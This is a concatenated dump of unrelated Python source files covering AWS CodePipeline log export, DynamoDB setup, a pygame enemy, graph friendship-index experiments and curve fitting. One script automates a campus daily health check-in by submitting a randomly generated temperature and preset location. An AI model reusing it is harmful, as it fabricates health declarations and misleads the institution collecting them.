action_execution_detail.get(\"input\").get(\"actionTypeId\")\n if (\n action_type_id.get(\"category\") == \"Build\"\n and action_type_id.get(\"owner\") == \"AWS\"\n and action_type_id.get(\"provider\") == \"CodeBuild\"\n ):\n external_execution_id = (\n action_execution_detail.get(\"output\")\n .get(\"executionResult\")\n .get(\"externalExecutionId\")\n )\n\n with betterboto_client.ClientContextManager(\n \"codebuild\", region_name=config.get_home_region(puppet_account_id)\n ) as codebuild:\n builds = codebuild.batch_get_builds(ids=[external_execution_id]).get(\n \"builds\"\n )\n build = builds[0]\n log_details = build.get(\"logs\")\n with betterboto_client.ClientContextManager(\n \"logs\", region_name=config.get_home_region(puppet_account_id)\n ) as logs:\n with open(\n f\"log-{action_execution_detail.get('input').get('configuration').get('ProjectName')}.log\",\n \"w\",\n ) as f:\n params = {\n \"logGroupName\": log_details.get(\"groupName\"),\n \"logStreamName\": log_details.get(\"streamName\"),\n \"startFromHead\": True,\n }\n has_more_logs = True\n while has_more_logs:\n get_log_events_response = logs.get_log_events(**params)\n 
if (len(get_log_events_response.get(\"events\"))) > 0:\n params[\"nextToken\"] = get_log_events_response.get(\n \"nextForwardToken\"\n )\n else:\n has_more_logs = False\n if params.get(\"nextToken\"):\n del params[\"nextToken\"]\n for e in get_log_events_response.get(\"events\"):\n d = datetime.utcfromtimestamp(\n e.get(\"timestamp\") / 1000\n ).strftime(\"%Y-%m-%d %H:%M:%S\")\n f.write(f\"{d} : {e.get('message')}\")\n\n\ndef export_puppet_pipeline_logs(execution_id, puppet_account_id):\n with betterboto_client.ClientContextManager(\n \"codepipeline\", region_name=config.get_home_region(puppet_account_id)\n ) as codepipeline:\n action_execution_details = codepipeline.list_action_executions(\n pipelineName=constants.PIPELINE_NAME,\n filter={\"pipelineExecutionId\": execution_id},\n ).get(\"actionExecutionDetails\")\n\n for action_execution_detail in action_execution_details:\n handle_action_execution_detail(puppet_account_id, action_execution_detail)\n\n\ndef uninstall(puppet_account_id):\n with betterboto_client.ClientContextManager(\n \"cloudformation\", region_name=config.get_home_region(puppet_account_id)\n ) as cloudformation:\n cloudformation.ensure_deleted(StackName=constants.BOOTSTRAP_STACK_NAME)\n\n\ndef release_spoke(puppet_account_id):\n with betterboto_client.ClientContextManager(\n \"cloudformation\", region_name=config.get_home_region(puppet_account_id)\n ) as cloudformation:\n cloudformation.ensure_deleted(\n StackName=f\"{constants.BOOTSTRAP_STACK_NAME}-spoke\"\n )\n\n\ndef wait_for_code_build_in(iam_role_arns):\n cross_accounts = []\n index = 0\n for role in iam_role_arns:\n cross_accounts.append((role, \"waiting-for-code-build-{}\".format(index)))\n index += 1\n\n with betterboto_client.CrossMultipleAccountsClientContextManager(\n \"codebuild\", cross_accounts\n ) as codebuild:\n while True:\n try:\n result = codebuild.list_projects()\n logger.info(f\"Was able to list projects: {result}\")\n break\n except Exception as e:\n logger.error(\"type error: \" + str(e))\n logger.error(traceback.format_exc())\n\n\ndef wait_for_cloudformation_in(iam_role_arns):\n cross_accounts = []\n index = 0\n for role in iam_role_arns:\n cross_accounts.append((role, \"waiting-for-cloudformation-{}\".format(index)))\n index += 1\n\n with betterboto_client.CrossMultipleAccountsClientContextManager(\n \"cloudformation\", cross_accounts\n ) as cloudformation:\n while True:\n try:\n result = cloudformation.list_stacks()\n logger.info(f\"Was able to list stacks: {result}\")\n break\n except Exception as e:\n logger.error(\"type error: \" + str(e))\n logger.error(traceback.format_exc())\n","sub_path":"servicecatalog_puppet/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":36921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
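The multi-region stack creation in `_do_bootstrap` fans out one thread per regional CloudFormation client and then joins them all. A pared-down sketch of that fan-out pattern, with a stub standing in for `client.create_or_update`:

```python
from threading import Thread

def create_or_update(region, **kwargs):
    # Stub for the per-region CloudFormation call made above.
    print(f"{region}: create_or_update {kwargs['StackName']}")

args = {"StackName": "servicecatalog-puppet-regional"}
threads = []
for client_region in ("eu-west-1", "us-east-1", "ap-southeast-2"):
    process = Thread(name=client_region, target=create_or_update,
                     args=(client_region,), kwargs=args)
    process.start()
    threads.append(process)
for process in threads:
    process.join()   # wait for every region before declaring success
```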
+{"seq_id":"183154528","text":"import boto3\n\ndynamodb = boto3.resource('dynamodb')\n\ntable = dynamodb.create_table(\n\tTableName='Contacts',\n\tKeySchema=[\n\t\t{\n\t\t\t'AttributeName': 'email_address',\n\t\t\t'KeyType': 'HASH' \n\t\t},\n\t\t{\n\t\t\t'AttributeName': 'full_name',\n\t\t\t'KeyType': 'RANGE'\n\t\t}\n\t],\n\tAttributeDefinitions=[\n\t\t{\n\t\t\t'AttributeName': 'email_address',\n\t\t\t'AttributeType': 'S'\n\t\t},\n\t\t{\n\t\t\t'AttributeName': 'full_name',\n\t\t\t'AttributeType': 'S'\n\t\t}\n\t],\n\tProvisionedThroughput={\n\t\t\"ReadCapacityUnits\": 5,\n\t\t\"WriteCapacityUnits\": 5\n\t}\n)\n\n# Wait until the table exists.\ntable.meta.client.get_waiter('table_exists').wait(TableName='Contacts')\nprint(\"Successfully created the table Contacts on\", table.creation_date_time)\n","sub_path":"db/db_scripts/dynamodb/CreateTableContacts.py","file_name":"CreateTableContacts.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"312561129","text":"import os\nimport pygame as pg\nimport random as rand\n\nfrom Rectangle import Rectangle\nimport Var\n\nred_img = pg.image.load(os.path.join('Assets', 'red_rect.png'))\n\nclass Enemy(Rectangle):\n \"\"\" Creates an enemy \"\"\"\n def __init__(self, x, y, width, height, WIN):\n super().__init__(x, y, width, height, WIN)\n self.img = pg.transform.scale(red_img, (self.width, self.height))\n self.speed = 5\n\n def move_enemies(self, enemies):\n \"\"\" Moves the enemy to the left at increasing speeds \"\"\"\n for enemy in enemies:\n enemy.x -= self.speed\n enemy.rect.center = enemy.x + 45, enemy.y + 37\n return enemies\n\n def out_enemy(self, enemies, ge):\n \"\"\" \n Removes the enemy and increases player fitness if the enemy has left the screen\n \"\"\"\n for enemy in enemies:\n if enemy.x + enemy.width < 0:\n self.speed += 0.25\n enemies.remove(enemy)\n self.x, self.y = Var.SCREEN_WIDTH, 400\n for g in ge:\n g.fitness += 0.01\n return ge\n","sub_path":"Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"432673667","text":"\"\"\"\nMiscellaneous functions for ARNA campaign work (pre/during/after)\n\"\"\"\nimport os\nimport sys\nimport xarray as xr\nimport glob\nimport numpy as np\nimport AC_tools as AC\nimport pandas as pd\nimport datetime as datetime\nimport time\nfrom time import gmtime, strftime\nimport gc\n\n\ndef get_visibility_reports(dts=None, folder='./', debug=False):\n \"\"\"\n Get the visibility reports from SDS-WAS\n \"\"\"\n import wget\n # Which dates to use\n if isinstance(dts, type(None)):\n Tnow = AC.time2datetime([gmtime()])[0]\n # Get the 5-day forecast at noon...\n dt = datetime.datetime(Tnow.year, Tnow.month, Tnow.day,)\n # Use yesterday\n dt = AC.add_days(dt, -1)\n # Use the last 18 days\n dts = [AC.add_days(dt, i*-1) for i in range(0, 5)]\n # URL for SDS-WAS address\n URL_str = 'https://sds-was.aemet.es/archive/images/visibility/'\n URL_str += '{}/{:0>2}/images/{}{:0>2}{:0>2}_visibility.png'\n # For dt in dts\n for dt in dts:\n if debug:\n print(dt)\n URL = URL_str.format(dt.year, dt.month, dt.year, dt.month, dt.day)\n if debug:\n print(URL)\n filename = URL.split('/')[-1]\n if debug:\n print(filename)\n wget.download(URL, folder+filename)\n\n\ndef convert_aircraft_locs2table():\n \"\"\"\n Make a csv file with details on the airports linked to ARNA campaign\n \"\"\"\n locs2use = ['Dakar', 'DSS', 'Sao Vicente Airport', 'VXE',\n 'Praia Airport', 'RAI',\n 'Gran Canaria Airport', 'LPA', 'Lisbon Airport', 'LIS',\n 'Paris (Charles de Gaulle) Airport', 'CDG'\n ]\n # Loop by location\n d = {}\n for loc in locs2use:\n lon, lat, alt = AC.get_loc(loc)\n # Add to dictionary\n d[loc] = {'Longitude': lon, 'Latitude': lat, 'Altitude': alt}\n # Compile to dataframe and then save.\n pd.DataFrame(d).T.round(2).to_csv('ARNA_Airport_locs.csv')\n","sub_path":"arna/campaign_misc.py","file_name":"campaign_misc.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"249133835","text":"# -*- encoding:utf-8 -*-\nimport requests\nimport json\nimport os\nimport utils\nfrom urllib.parse import urlencode\n\n\nclass WoZaiXiaoYuanPuncher:\n def __init__(self):\n # JWSESSION\n self.jwsession = None\n # 打卡时段\n self.seq = None\n # 打卡结果\n self.status_code = 0\n # 登陆接口\n self.loginUrl = \"https://gw.wozaixiaoyuan.com/basicinfo/mobile/login/username\"\n # 请求头\n self.header = {\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Connection\": \"keep-alive\",\n \"User-Agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.13(0x18000d32) NetType/WIFI Language/zh_CN miniProgram\",\n \"Content-Type\": \"application/json;charset=UTF-8\",\n \"Content-Length\": \"2\",\n \"Host\": \"gw.wozaixiaoyuan.com\",\n \"Accept-Language\": \"en-us,en\",\n \"Accept\": \"application/json, text/plain, */*\"\n }\n # 请求体(必须有)\n self.body = \"{}\"\n\n # 登录\n def login(self):\n username, password = str(os.environ['WZXY_USERNAME']), str(os.environ['WZXY_PASSWORD'])\n url = f'{self.loginUrl}?username={username}&password={password}' \n self.session = requests.session()\n # 登录\n response = self.session.post(url=url, data=self.body, headers=self.header)\n res = json.loads(response.text)\n if res[\"code\"] == 0:\n print(\"使用账号信息登录成功\")\n jwsession = response.headers['JWSESSION']\n self.setJwsession(jwsession)\n return True\n else:\n print(res)\n print(\"登录失败,请检查账号信息\")\n self.status_code = 5\n return False\n\n # 设置JWSESSION\n def setJwsession(self, jwsession):\n # 如果找不到cache,新建cache储存目录与文件\n if not os.path.exists('.cache'): \n print(\"正在创建cache储存目录与文件...\")\n os.mkdir('.cache')\n data = {\"jwsession\":jwsession}\n elif not os.path.exists('.cache/cache.json'):\n print(\"正在创建cache文件...\")\n data = {\"jwsession\":jwsession}\n # 如果找到cache,读取cache并更新jwsession\n else:\n print(\"找到cache文件,正在更新cache中的jwsession...\")\n data = utils.processJson('.cache/cache.json').read()\n data['jwsession'] = jwsession \n utils.processJson(\".cache/cache.json\").write(data)\n self.jwsession = data['jwsession'] \n \n # 获取JWSESSION\n def getJwsession(self):\n if not self.jwsession: # 读取cache中的配置文件\n data = utils.processJson(\".cache/cache.json\").read()\n self.jwsession = data['jwsession'] \n return self.jwsession\n\n # 获取打卡列表,判断当前打卡时间段与打卡情况,符合条件则自动进行打卡\n def PunchIn(self):\n print(\"获取打卡列表中...\")\n url = \"https://student.wozaixiaoyuan.com/heat/getTodayHeatList.json\"\n self.header['Host'] = \"student.wozaixiaoyuan.com\"\n self.header['JWSESSION'] = self.getJwsession()\n self.session = requests.session()\n response = self.session.post(url=url, data=self.body, headers=self.header)\n res = json.loads(response.text)\n # 如果 jwsession 无效,则重新 登录 + 打卡\n if res['code'] == -10:\n print(res)\n print('jwsession 无效,将尝试使用账号信息重新登录')\n self.status_code = 4\n loginStatus = self.login()\n if loginStatus:\n self.PunchIn()\n else:\n print(res)\n print(\"重新登录失败,请检查账号信息\") \n elif res['code'] == 0: \n # 标志时段是否有效\n inSeq = False\n # 遍历每个打卡时段(不同学校的打卡时段数量可能不一样)\n for i in res['data']:\n # 判断时段是否有效\n if int(i['state']) == 1:\n inSeq = True\n # 保存当前学校的打卡时段\n self.seq = int(i['seq'])\n # 判断是否已经打卡\n if int(i['type']) == 0:\n self.doPunchIn(str(i['seq']))\n elif int(i['type']) == 1:\n self.status_code = 2\n print(\"已经打过卡了\")\n # 如果当前时间不在任何一个打卡时段内\n if inSeq == False: \n self.status_code = 3\n print(\"打卡失败:不在打卡时间段内\")\n\n # 执行打卡\n # 参数seq : 当前打卡的序号\n def doPunchIn(self, seq):\n print(\"正在进行:\" + self.getSeq() + \"...\")\n url = 
\"https://student.wozaixiaoyuan.com/heat/save.json\"\n self.header['Host'] = \"student.wozaixiaoyuan.com\"\n self.header['Content-Type'] = \"application/x-www-form-urlencoded\"\n self.header['JWSESSION'] = self.getJwsession()\n sign_data = {\n \"answers\": '[\"0\"]',\n \"seq\": str(seq),\n \"temperature\": utils.getRandomTemperature(os.environ['WZXY_TEMPERATURE']),\n \"latitude\": os.environ['WZXY_LATITUDE'],\n \"longitude\": os.environ['WZXY_LONGITUDE'],\n \"country\": os.environ['WZXY_COUNTRY'],\n \"city\": os.environ['WZXY_CITY'],\n \"district\": os.environ['WZXY_DISTRICT'],\n \"province\": os.environ['WZXY_PROVINCE'],\n \"township\": os.environ['WZXY_TOWNSHIP'],\n \"street\": os.environ['WZXY_STREET'],\n \"myArea\": \"\",\n \"areacode\": \"\",\n \"userId\": \"\"\n }\n data = urlencode(sign_data)\n self.session = requests.session() \n response = self.session.post(url=url, data=data, headers=self.header)\n response = json.loads(response.text)\n # 打卡情况\n if response[\"code\"] == 0:\n self.status_code = 1\n print(\"打卡成功\")\n else:\n print(response)\n print(\"打卡失败\")\n \n # 获取打卡时段\n def getSeq(self):\n seq = self.seq\n if seq == 1:\n return \"早打卡\"\n elif seq == 2:\n return \"午打卡\"\n elif seq == 3:\n return \"晚打卡\"\n else:\n return \"非打卡时段\"\n \n # 获取打卡结果\n def getResult(self):\n res = self.status_code\n if res == 1:\n return \"✅ 打卡成功\"\n elif res == 2:\n return \"✅ 你已经打过卡了,无需重复打卡\"\n elif res == 3:\n return \"❌ 打卡失败,当前不在打卡时间段内\"\n elif res == 4:\n return \"❌ 打卡失败,jwsession 无效\" \n elif res == 5:\n return \"❌ 打卡失败,登录错误,请检查账号信息\"\n else:\n return \"❌ 打卡失败,发生未知错误,请检查日志\"\n\n # 推送打卡结果\n def sendNotification(self):\n notifyTime = utils.getCurrentTime()\n notifyResult = self.getResult()\n notifySeq = self.getSeq()\n\n if os.environ.get('SCT_KEY'):\n # serverchan 推送\n notifyToken = os.environ['SCT_KEY']\n url = \"https://sctapi.ftqq.com/{}.send\"\n body = {\n \"title\": \"⏰ 我在校园打卡结果通知\",\n \"desp\": \"打卡项目:日检日报\\n\\n打卡情况:{}\\n\\n打卡时段:{}\\n\\n打卡时间:{}\".format(notifyResult, notifySeq, notifyTime)\n }\n requests.post(url.format(notifyToken), data=body)\n print(\"消息经Serverchan-Turbo推送成功\")\n if os.environ.get('PUSHPLUS_TOKEN'):\n # pushplus 推送\n url = 'http://www.pushplus.plus/send'\n notifyToken = os.environ['PUSHPLUS_TOKEN']\n content = json.dumps({\n \"打卡项目\": \"日检日报\",\n \"打卡情况\": notifyResult,\n \"打卡时段\": notifySeq,\n \"打卡时间\": notifyTime\n }, ensure_ascii=False)\n msg = {\n \"token\": notifyToken,\n \"title\": \"⏰ 我在校园打卡结果通知\",\n \"content\": content,\n \"template\": \"json\"\n }\n requests.post(url, data=msg)\n print(\"消息经pushplus推送成功\")\n if os.environ.get('BARK_TOKEN'):\n # bark 推送\n notifyToken = os.environ['BARK_TOKEN']\n req = \"{}/{}/{}\".format(notifyToken, \"⏰ 我在校园打卡(日检日报)结果通知\", notifyResult)\n requests.get(req)\n print(\"消息经bark推送成功\")\n if os.environ.get(\"MIAO_CODE\"):\n baseurl = \"https://miaotixing.com/trigger\"\n body = {\n \"id\": os.environ['MIAO_CODE'],\n \"text\": \"打卡项目:日检日报\\n\\n打卡情况:{}\\n\\n打卡时段:{}\\n\\n打卡时间:{}\".format(notifyResult, notifySeq, notifyTime)\n }\n requests.post(baseurl, data=body)\n print(\"消息经喵推送推送成功\")\n\n\nif __name__ == '__main__':\n # 找不到cache,登录+打卡\n wzxy = WoZaiXiaoYuanPuncher()\n if not os.path.exists('.cache'):\n print(\"找不到cache文件,正在使用账号信息登录...\")\n loginStatus = wzxy.login()\n if loginStatus:\n wzxy.PunchIn()\n else:\n print(\"登陆失败,请检查账号信息\")\n else:\n print(\"找到cache文件,尝试使用jwsession打卡...\")\n wzxy.PunchIn()\n 
wzxy.sendNotification()","sub_path":"wzxy-dailyreport.py","file_name":"wzxy-dailyreport.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"141303749","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport random\nimport numpy as np\nimport time\nimport math\nfrom bisect import bisect_left\nfrom datetime import datetime\nfrom sklearn.linear_model import LinearRegression\n\n### To run the experiments\n# a) Change input_type_num variable below\n# b1) For real graph change filename in experiment_file() function\n# b2) For BA model change parameters in experiment_ba() function\n# b3) For TC model change parameters in experiment_triadic() function\n# focus_indices array allows to record trajectory of nodes with selected indices, i.e [10, 50, 100, 1000]\n# To average results go to process_output.py\n# To calculate ratio of friendship paradox go to analyze_hist.py\n# hist_ files contain histograms on linear and log-log scale as well as linreg approximation\n# out_ files contain raw results for nodes in focus_indices array\n# please, do not rename output files for further processing to avoid errors\n\n# Works on Python 3.7.6\n### Full instructions in Readme.md\n\n\ninput_types = [\"from_file\", \"barabasi-albert\", \"triadic\", \"test\"]\n# Change value below to run experiment\ninput_type_num = 2\n\ndef get_neighbor_summary_degree(graph, node):\n neighbors_of_node = graph.neighbors(node)\n acc = 0\n for neighbor in neighbors_of_node:\n acc += graph.degree(neighbor)\n return acc\n\n\ndef get_neighbor_average_degree(graph, node, si=None):\n if not si:\n si = get_neighbor_summary_degree(graph, node)\n return si / graph.degree(node)\n\n\ndef get_friendship_index(graph, node, ai=None):\n if not ai:\n ai = get_neighbor_average_degree(graph, node)\n return ai / graph.degree(node)\n\n\n# Acquires histograms for friendship index \ndef analyze_fi_graph(graph, filename):\n graph_nodes = graph.nodes()\n\n # b (beta) = friendship index \n maxb = 0\n bs = []\n # get all values of friendship index\n for node in graph_nodes:\n new_b = get_friendship_index(graph, node)\n if new_b > maxb:\n maxb = new_b\n bs.append(new_b)\n \n # n=values, bins=edges of bins\n n, bins, _ = plt.hist(bs, bins=range(int(maxb)), rwidth=0.85)\n\n # leave only non-zero\n n_bins = zip(n, bins)\n n_bins = list(filter(lambda x: x[0] > 0, n_bins))\n n, bins = [ a for (a,b) in n_bins ], [ b for (a,b) in n_bins ]\n \n # get log-log scale distribution\n lnt, lnb = [], []\n for i in range(len(bins) - 1):\n if (n[i] != 0):\n lnt.append(math.log(bins[i+1]))\n lnb.append(math.log(n[i]) if n[i] != 0 else 0)\n\n # prepare for linear regression\n np_lnt = np.array(lnt).reshape(-1, 1)\n np_lnb = np.array(lnb)\n\n # linear regression to get power law exponent\n model = LinearRegression()\n model.fit(np_lnt, np_lnb)\n linreg_predict = model.predict(np_lnt)\n\n [directory, filename] = filename.split('/')\n f = open(directory + \"/hist_\" + filename, \"w\")\n f.write(\"t\\tb\\tlnt\\tlnb\\tlinreg\\t k=\" + str(model.coef_) + \", b=\" + str(model.intercept_) + \"\\n\")\n\n for i in range(len(lnb)):\n f.write(str(bins[i]) + \"\\t\" + str(int(n[i])) + \"\\t\" + str(lnt[i]) + \"\\t\" + str(lnb[i]) + \"\\t\" + str(linreg_predict[i]) + \"\\n\")\n f.close()\n\n\n# 0 - From file\ndef experiment_file():\n filename = \"phonecalls.edgelist.txt\"\n graph = nx.read_edgelist(filename)\n analyze_fi_graph(graph, filename)\n \n\n# 1 Barabasi-Albert\ndef create_ba(n, m, focus_indices):\n G = nx.complete_graph(m)\n\n # get node statistics\n s_a_b_focus = []\n for focus_ind in focus_indices:\n s_a_b_focus.append(([], [], []))\n\n for k in range(m, n + 1):\n deg = dict(G.degree) \n 
G.add_node(k) \n    \n        vertex = list(deg.keys()) \n        weights = list(deg.values())\n\n        # preferential attachment \n        nodes_to_connect = random.choices(vertex, weights, k=m) \n        for node in nodes_to_connect: # TODO: same node twice\n            G.add_edge(k, node)\n\n        # save focus node statistics\n        if k % 50 == 0:\n            for i in range(len(s_a_b_focus)):\n                s_a_b = s_a_b_focus[i]\n                focus_ind = focus_indices[i]\n                if focus_ind < k:\n                    si = get_neighbor_summary_degree(G, focus_ind)\n                    ai = get_neighbor_average_degree(G, focus_ind, si)\n                    bi = get_friendship_index(G, focus_ind, ai)\n                    s_a_b[0].append(si)\n                    s_a_b[1].append(round(ai, 4))\n                    s_a_b[2].append(round(bi, 4))\n\n\n    should_plot = False\n    if should_plot:\n        s_a_b = s_a_b_focus[0]\n        s_focus_xrange = [x / len(s_a_b[0]) for x in range(len(s_a_b[0]))]\n        plt.plot(s_focus_xrange, s_a_b[0])\n        plt.show()\n        s_focus_xrange = [x / len(s_a_b[1]) for x in range(len(s_a_b[1]))]\n        plt.plot(s_focus_xrange, s_a_b[1])\n        plt.show()\n        s_focus_xrange = [x / len(s_a_b[2]) for x in range(len(s_a_b[2]))]\n        plt.plot(s_focus_xrange, s_a_b[2])\n        plt.show()\n\n    #print(G.degree)\n    return (G, s_a_b_focus)\n\n\ndef experiment_ba():\n    ### Change these parameters ###\n    n = 10000\n    m = 3\n    number_of_experiments = 3\n    focus_indices = [50, 100]\n    ### \n    filename = f\"output/out_ba_{n}_{m}\"\n\n    start_time = time.time()\n    now = datetime.now()\n    should_write = True\n    if should_write:\n        files = []\n        for ind in focus_indices:\n            f_s = open(f\"{filename}_{ind}_s.txt\", \"a\")\n            f_a = open(f\"{filename}_{ind}_a.txt\", \"a\")\n            f_b = open(f\"{filename}_{ind}_b.txt\", \"a\")\n            files.append((f_s, f_a, f_b))\n        now = datetime.now()\n        for i in range(len(focus_indices)):\n            for f in files[i]:\n                f.write(\"> n=\" + str(n) + \" m=\" + str(m) + \" \" + now.strftime(\"%d/%m/%Y %H:%M:%S\") + \"\\n\")\n        for _ in range(number_of_experiments):\n            graph, result = create_ba(n, m, focus_indices)\n            for i in range(len(focus_indices)):\n                for j in range(len(result[i])):\n                    files[i][j].write(\" \".join(str(x) for x in result[i][j]) + \"\\n\")\n        analyze_fi_graph(graph, filename + \".txt\")\n    else:\n        graph, result = create_ba(n, m, focus_indices)\n        #analyze_fi_graph(graph, \"test.txt\")\n    print((\"Elapsed time: %s\", time.time() - start_time))\n    \n\n# 2 Triadic Closure\ndef create_triadic(n, m, p, focus_indices):\n    G = nx.complete_graph(m)\n\n    s_a_b_focus = []\n    for focus_ind in focus_indices:\n        s_a_b_focus.append(([], [], []))\n\n    # k - index of added node\n    for k in range(m, n + 1):\n        deg = dict(G.degree) \n        G.add_node(k) \n    \n        vertex = list(deg.keys()) \n        weights = list(deg.values())\n        \n        [j] = random.choices(range(0, k), weights) # choose first node\n        j1 = vertex[j]\n        del vertex[j]\n        del weights[j]\n\n        lenP1 = k - 1 # length of list of vertices \n\n        vertex1 = G[j1]\n        lenP2 = len(vertex1)\n        \n        numEdj = m - 1 # number of additional edges\n\n        if numEdj > lenP1: # not more than size of the graph\n            numEdj = lenP1\n\n        randNums = np.random.rand(numEdj) # list of random numbers\n        neibCount = np.count_nonzero(randNums <= p) # number of elements less or equal than p\n        # which is equal to the number of nodes adjacent to j, which should be connected to k\n        if neibCount > lenP2 : # not more than neighbors of j\n            neibCount = lenP2 \n        vertCount = numEdj - neibCount # number of arbitrary nodes of the graph to connect with k\n\n        neibours = random.sample(list(vertex1), neibCount) # list of vertices drawn from the neighbors of j1\n        \n        G.add_edge(j1, k)\n\n        for i in neibours:\n            G.add_edge(i, k)\n            j = vertex.index(i) # 
delete i and its weight from lists\n del weights [j]\n lenP1 -= 1\n\n for _ in range(0, vertCount):\n [i] = random.choices(range(0, lenP1), weights)\n G.add_edge(vertex[i], k)\n del vertex[i]\n del weights[i]\n lenP1 -= 1\n\n\n # save focus node statistics\n if k % 50 == 0:\n for i in range(len(s_a_b_focus)):\n s_a_b = s_a_b_focus[i]\n focus_ind = focus_indices[i]\n if focus_ind < k:\n si = get_neighbor_summary_degree(G, focus_ind)\n ai = get_neighbor_average_degree(G, focus_ind, si)\n bi = get_friendship_index(G, focus_ind, ai)\n s_a_b[0].append(si)\n s_a_b[1].append(round(ai, 4))\n s_a_b[2].append(round(bi, 4))\n\n\n should_plot = False\n if should_plot:\n s_a_b = s_a_b_focus[0]\n s_focus_xrange = [x / len(s_a_b[0]) for x in range(len(s_a_b[0]))]\n plt.plot(s_focus_xrange, s_a_b[0])\n plt.show()\n s_focus_xrange = [x / len(s_a_b[1]) for x in range(len(s_a_b[1]))]\n plt.plot(s_focus_xrange, s_a_b[1])\n plt.show()\n s_focus_xrange = [x / len(s_a_b[2]) for x in range(len(s_a_b[2]))]\n plt.plot(s_focus_xrange, s_a_b[2])\n plt.show()\n\n return (G, s_a_b_focus)\n\n\ndef experiment_triadic():\n n = 10000\n m = 3\n p = 0.75\n number_of_experiments = 3\n focus_indices = [10, 50, 100]\n filename = f\"output/out_tri_{n}_{m}_{p}\"\n\n should_write = True\n if should_write:\n files = []\n for ind in focus_indices:\n f_s = open(f\"{filename}_{ind}_s.txt\", \"a\")\n f_a = open(f\"{filename}_{ind}_a.txt\", \"a\")\n f_b = open(f\"{filename}_{ind}_b.txt\", \"a\")\n files.append((f_s, f_a, f_b))\n now = datetime.now()\n start_time = time.time()\n for i in range(len(focus_indices)):\n for f in files[i]:\n f.write(\"> n=\" + str(n) + \" m=\" + str(m) + \" \" + now.strftime(\"%d/%m/%Y %H:%M:%S\") + \"\\n\")\n for _ in range(number_of_experiments):\n graph, result = create_triadic(n, m, p, focus_indices)\n for i in range(len(focus_indices)):\n for j in range(len(result[i])):\n files[i][j].write(\" \".join(str(x) for x in result[i][j]) + \"\\n\")\n analyze_fi_graph(graph, filename + \".txt\")\n print((\"Elapsed time: %s\", time.time() - start_time))\n else:\n graph, result = create_triadic(n, m, p, focus_indices)\n analyze_fi_graph(graph, \"test.txt\")\n \n\n# 3 Test data\ndef print_node_values(graph, node_i):\n print(\"Summary degree of neighbors of node %s (si) is %s\" % (node_i, get_neighbor_summary_degree(graph, node_i)))\n print(\"Average degree of neighbors of node %s (ai) is %s\" % (node_i, get_neighbor_average_degree(graph, node_i)))\n print(\"Friendship index of node %s (bi) is %s\" % (node_i, get_friendship_index(graph, node_i)))\n\n\ndef experiment_test():\n filename = \"test_graph.txt\"\n\n graph = nx.read_edgelist(filename)\n print_node_values(graph, '1')\n \n nx.draw(graph, with_labels=True)\n plt.show()\n\n\nif __name__ == \"__main__\":\n input_type = input_types[input_type_num]\n print(\"Doing %s experiment\" % input_type)\n if input_type == \"from_file\":\n experiment_file()\n elif input_type == \"barabasi-albert\":\n experiment_ba()\n elif input_type == \"triadic\":\n experiment_triadic()\n elif input_type == \"test\":\n experiment_test()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
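The `main.py` record above computes its friendship-index quantities with hand-rolled generators. A minimal sketch of the same three statistics (si = summary degree of neighbors, ai = si/deg, bi = ai/deg) on networkx's built-in Barabási–Albert generator; the sizes and seed are arbitrary demo choices:

```python
import networkx as nx

G = nx.barabasi_albert_graph(n=200, m=3, seed=42)  # arbitrary demo parameters

node = 0
si = sum(G.degree(nb) for nb in G.neighbors(node))  # summary degree of neighbors
ai = si / G.degree(node)                            # average neighbor degree
bi = ai / G.degree(node)                            # friendship index
print(f"node {node}: si={si}, ai={ai:.2f}, bi={bi:.2f}")
```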
+{"seq_id":"352442608","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.optimize import minimize, minimize_scalar\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, max_error\n\ndef MAE(y, pred):\n return np.mean(abs(y-pred))\n\n\ndef k1(T, c1, c2, n):\n return c1 * c2 * (T**n) / (c2 + c1 * (T**n))\n\ndef k2(T, c3, c4):\n return c3*np.exp(-1 * c4 / T)\n\ndef f_k(T, c1, c2, n, c3, c4):\n return k1(T, c1, c2, n) + k2(T, c3, c4)\n\ndef open_file(path):\n with open(path, 'r') as f:\n data_raw = f.readlines()\n data_raw = [d.replace(' ', '\\t').replace('\\n', '') for d in data_raw]\n data = [d.split('\\t') for d in data_raw]\n data = pd.DataFrame(data[1:], columns=['T', 'k'])\n return data\n\ndef preprocess(data):\n for c in data.columns:\n data[c] = data[c].astype('float')\n data['T_log'] = np.log(data['T'])\n data['k_log'] = np.log(data['k'])\n return data\n\ndef ploynomal_fit(data):\n z = np.polyfit(data['T_log'], data['k_log'], 7)\n p = np.poly1d(z)\n return p\n\ndef interpolate(p, min, max):\n xp = np.linspace(min, max, 200)\n ap_df = pd.DataFrame({'x': xp})\n ap_df['y'] = [p(x) for x in xp]\n return ap_df\n\ndef find_bend_points(p):\n p3 = np.polyder(p, m=3)\n roots = np.roots(p3)\n return sorted([x for x in roots if (np.exp(x)>2) and (np.exp(x)<=70)])\n\ndef refine_palteue(interp_df, bent_pts):\n plateue = interp_df[(interp_df['x'] > bent_pts[0]) & (interp_df['x'] < bent_pts[1])]\n plateue['ae'] = plateue['y'].apply(lambda x: plateue['y'].mean() - x)\n var = np.var(plateue['ae'])\n plateue = plateue[plateue['ae'].abs() < 3*var]\n return plateue[['x', 'y']].apply(lambda x: np.exp(x))\n\n\ndef approximate(data):\n data = preprocess(data)\n polynom = ploynomal_fit(data)\n\n interp_df_log = interpolate(polynom, data['T_log'].min(), 